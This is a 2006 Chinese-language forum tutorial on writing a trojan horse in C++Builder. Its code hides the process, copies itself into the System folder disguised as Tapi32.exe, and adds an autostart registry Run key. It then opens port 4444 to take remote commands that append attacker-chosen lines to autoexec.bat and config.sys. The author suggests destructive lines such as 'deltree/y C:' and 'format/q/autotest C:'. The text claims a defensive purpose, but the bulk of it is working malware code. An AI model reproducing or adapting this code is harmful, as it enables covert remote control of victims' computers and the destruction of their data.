史萊姆論壇

返回   史萊姆論壇 > 教學文件資料庫 > Hacker/Cracker 及加解密技術文件
忘記密碼?
論壇說明 標記討論區已讀

歡迎您來到『史萊姆論壇』 ^___^

您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的!

請點擊這裡:『註冊成為我們的一份子!』

Google 提供的廣告


 
 
主題工具 顯示模式
舊 2006-03-21, 10:59 AM   #1
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設 木馬是如何編寫的

木馬是如何編寫的



特洛依木馬這個名詞大家應該不陌生,自從98年「死牛崇拜」黑客小組公佈Back Orifice以來,木馬猶如

平地上的驚雷, 使在Dos——Windows時代中長大的中國線人從五彩繽紛的網路之夢中驚醒,終於認識到

的網路也有它邪惡的一面,一時間人心惶惶。

  我那時在《電腦報》上看到一篇文章,大意是一個菜鳥被人用BO控制了,嚇得整天吃不下飯、睡不著

覺、上不了網,到處求救!要知道,木馬(Trojan)的歷史是很悠久的:早在AT&T Unix和BSD Unix十分

盛行的年代,木馬是由一些玩程式(主要是C)水準很高的年輕人(主要是老美)用C或Shell語言編寫的

,基本是用來竊取登入主機的密碼,以取得更高的權限。那時木馬的主要方法是誘騙——先修改你

的.profile文件,植入木馬;當你登入時將你敲入的密碼字串存入一個文件,用Email的形式發到攻擊者

的郵信箱裡。國內的年輕人大都是在盜版Dos的熏陶下長大的,對網路可以說很陌生。直到Win9x橫空出世,

尤其是WinNt的普及,大大推動了網路事業的發展的時候,BO這個用三年後的眼光看起來有點簡單甚至可

以說是簡陋的木馬(甚至在Win9x的「關閉程序」對話視窗可以看到工作)給了當時中國人極大的震撼,它

在中國的網路安全方面可以說是一個劃時代的軟體。

  自己編寫木馬,聽起來很Cool是不是?!木馬一定是由兩部分組成——伺服器程序(Server)和客戶

端程序(Client),伺服器負責開啟攻擊的道路,就像一個內奸特務;客戶端負責攻擊目標,兩者需要一

定的網路傳輸協定來進行通訊(一般是TCP/IP傳輸協定)。為了讓大家更好的瞭解木馬攻擊技術,破除木馬的神秘

感,我就來粗略講一講編寫木馬的技術並順便編寫一個例子木馬,使大家能更好地防範和查殺各種已知和

未知的木馬。

  首先是編程工具的選項。目前流行的開發工具有C++Builder、VC、VB和Delphi,這裡我們選用

C++Builder(以下簡稱BCB);VC雖然好,但GUI設計太複雜,為了更好地突出我的例子,集中注意力在木

馬的基本原理上,我們選用可視化的BCB;Delphi也不錯,但缺陷是不能繼承已有的資源(如「死牛崇拜

」黑客小組公佈的BO2000來源碼,是VC編寫的,網上俯拾皆是);VB嘛,談都不談——難道你還給受害者

傳一個1兆多的動態連接庫——Msvbvm60.dll嗎?

啟動C++Builder 5.0企業版,新增一個工程,增加三個VCL控件:一個是Internet頁中的Server Socket,

另兩個是Fastnet頁中的NMFTP和NMSMTP。Server Socket的功能是用來使本程序變成一個伺服器程序,可

以對外服務(對攻擊者敞開大門)。Socket最初是在Unix上出現的,後來微軟將?o?憡w薟indows中(包括

Win98和WinNt);後兩個控件的作用是用來使程序具有FTP(File Transfer Protocol文件傳輸傳輸協定)和

SMTP(Simple Mail Transfer Protocol簡單郵件傳輸傳輸協定)功能,大家一看都知道是使軟體具有上傳下

載功能和發郵件功能的控件。

  Form表單是可視的,這當然是不可思議的。不光佔去了大量的空間(光一個Form就有300K之大),而

且使軟體可見,根本沒什麼作用。因此實際寫木馬時可以用一些技巧使程序不包含Form,就像Delphi用過

程實現的小程序一般只有17K左右那樣。

  我們首先應該讓我們的程序能夠隱身。雙按Form,首先在FormCreate事件中增加可使木馬在Win9x的

「關閉程序」對話視窗中隱藏的程式碼。這看起來很神秘,其實說穿了不過是一種被稱之為Service的後台進

程,它可以執行在較高的優先等級下,可以說是非常靠近系統核心的設備驅動程式中的那一種。因此,只要將

我們的程序在工作資料庫中用RegisterServiceProcess()函數註冊成服務工作(Service Process)就

可以了。不過該函數的宣告在Borland預先打包的頭文件中沒有,那麼我們只好自己來宣告這個位於

KERNEL32.DLL中的鳥函數了。

  首先判斷目標機的作業系統是Win9x還是WinNt:

{
DWORD dwVersion = GetVersion();
// 得到作業系統的版本號
if (dwVersion >= 0x80000000)
// 作業系統是Win9x,不是WinNt
 {
   typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
    //定義RegisterServiceProcess()函數的原型
    HINSTANCE hDLL;
   LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
   hDLL = LoadLibrary("KERNEL32");
   //載入RegisterServiceProcess()函數所在的動態連接庫KERNEL32.DLL
   lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress

(hDLL,"RegisterServiceProcess");
    //得到RegisterServiceProcess()函數的位址
    lpRegisterServiceProcess(GetCurrentProcessId(),1);
   //執行RegisterServiceProcess()函數,隱藏本工作
   FreeLibrary(hDLL);
   //卸載動態連接庫
 }
}

  這樣就終於可以隱身了(害我敲了這麼多程式碼!)。為什麼要判斷作業系統呢?因為WinNt中的工作

管理器可以對當繼續程一覽無餘,因此沒必要在WinNt下也使用以上程式碼(不過你可以使用其他的方法,

這個留到後面再講)。


接著再將自己拷貝一份到%System%目錄下,例如:C:\Windows\System,並修改註冊表,以便啟動時自動

載入:

{ 
char TempPath[MAX_PATH];
//定義一個變數
GetSystemDirectory(TempPath ,MAX_PATH);
//TempPath是system目錄緩衝區的位址,MAX_PATH是緩衝區的大小,得到目標機的System目錄路徑
SystemPath=AnsiString(TempPath);
//格式化TempPath字串串,使之成為能供編譯器使用的樣式
CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE

);
//將自己拷貝到%System%目錄下,並改名為Tapi32.exe,偽裝起來
Registry=new TRegistry;
//定義一個TRegistry對象,準備修改註冊表,這一步必不可少
Registry->RootKey=HKEY_LOCAL_MACHINE;
//設定主鍵為HKEY_LOCAL_MACHINE
Registry->OpenKey("Software\\Microsoft\\Windows\\
CurrentVersion\\Run",TRUE);
//開啟鍵值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就新增之
try
 {
  //如果以下語句發生異常,跳至catch,以避免程序崩潰
  if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")
    Registry->WriteString("crossbow",SystemPath+"\\Tapi32.exe");
    //尋找是否有「crossbow」字樣的鍵值,並且是否為拷貝的目錄%System%+Tapi32.exe
   //如果不是,就寫入以上鍵值和內容
 }
catch(...)
 {
 //如果有錯誤,什麼也不做
 }
}

  好,FormCreate程序完成了,這樣每次啟動都可以自動載入Tapi32.exe,並且在「關閉程序」對話視窗

中看不見本工作了,木馬的雛形初現。

  接著選ServerSocket控件,在左邊的Object Inspector中將Active改為true,這樣程序一啟動就打

開特定連接阜,處於伺服器工作狀態。再將Port填入4444,這是木馬的連接阜號,當然你也可以用別的。但是

你要注意不要用1024以下的低端連接阜,因為這樣不但可能會與基本網路傳輸協定使用的連接阜相衝突,而且很容

易被發覺,因此盡量使用1024以上的高端連接阜(不過也有這樣一種技術,它故意使用特定連接阜,因為如果

引起衝突,Windows也不會報告錯誤 ^_^)。你可以看一看TNMFTP控件使用的連接阜,是21號連接阜,這是FTP傳輸協定

的專用控制連接阜(FTP Control Port);同理TNMSMTP的25號連接阜也是SMTP傳輸協定的專用連接阜。

  再選ServerSocket控件,點擊Events頁,雙按OnClientRead事件,敲入以下程式碼:

{
 FILE *fp=NULL;
 char * content;
 int times_of_try;
 char TempFile[MAX_PATH];
 //定義了一堆待會兒要用到的變數
 sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str())

;
 //在%System%下建立一個文本文件Win369.bat,作為臨時文件使用
 AnsiString temp=Socket->ReceiveText();
 //接收客戶端(攻擊者,也就是你自己)傳來的資料
}


好,大門敞開了!接著就是修改目標機的各種組態了!^_^ 首先我們來修改Autoexec.bat和Config.sys吧



{
if(temp.SubString(0,9)=="edit conf")
 //如果接受到的字串串的前9個字串是「edit conf」
 {
   int number=temp.Length();
   //得到字串串的長度
   int file_name=atoi((temp.SubString(11,1)).c_str());
   //將第11個字串轉換成integer型,存入file_name變數
   //為什麼要取第11個字串,因為第10個字串是空格字串
   content=(temp.SubString(12,number-11)+'\n').c_str();
   //餘下的字串串將被作為寫入的內容寫入目標文件
   FILE *fp=NULL;
   char filename[20];
   chmod("c:\\autoexec.bat",S_IREAD|S_IWRITE);
   chmod("c:\\config.sys",S_IREAD|S_IWRITE);
   //將兩個目標文件的內容改為可讀可寫
   if(file_name==1)
    sprintf(filename,"%s","c:\\autoexec.bat");
    //如果第11個字串是1,就把Autoexec.bat格式化
   else if(file_name==2)
    sprintf(filename,"%s","c:\\config.sys");
    //如果第11個字串是1,就把Config.sys格式化
   times_of_try=0;
   //定義計數器
   while(fp==NULL)
    {
     //如果游標是空
    fp=fopen(filename,"a+");
    //如果文件不存在,新增之;如果存在,準備在其後增加
    //如果出現錯誤,文件游標為空,這樣就會重複
    times_of_try=times_of_try+1;
    //計數器加1
    if(times_of_try>100)
    {
       //如果已經試了100次了,仍未成功
       Socket->SendText("Fail By Open File");
       //就發回「Fail By Open File」的錯誤訊息
       goto END;
       //跳至END處
    }
    }
   fwrite(content,sizeof(char),strlen(content),fp);
   //寫入增加的語句,例如deltree/y C:或者format/q/autotest C:,夠毒吧?!
   fclose(fp);
   //寫完後關閉目標文件
   Socket->SendText("Sucess");
   //然後發回「Success」的成功訊息
  }
}

  你現在可以通過網路來察看目標機上的這兩個文件了,並且還可以向裡面隨意增加任何指令。哈哈,

這只不過是牛刀小試罷了。朋友,別走開!
__________________
http://bbsimg.qianlong.com/upload/01/08/29/68/1082968_1136014649812.gif
psac 目前離線  
送花文章: 3, 收花文章: 1630 篇, 收花: 3204 次
 


主題工具
顯示模式

發表規則
不可以發文
不可以回覆主題
不可以上傳附加檔案
不可以編輯您的文章

論壇啟用 BB 語法
論壇啟用 表情符號
論壇啟用 [IMG] 語法
論壇禁用 HTML 語法
Trackbacks are 禁用
Pingbacks are 禁用
Refbacks are 禁用


所有時間均為台北時間。現在的時間是 12:40 AM


Powered by vBulletin® 版本 3.6.8
版權所有 ©2000 - 2020, Jelsoft Enterprises Ltd.


SEO by vBSEO 3.6.1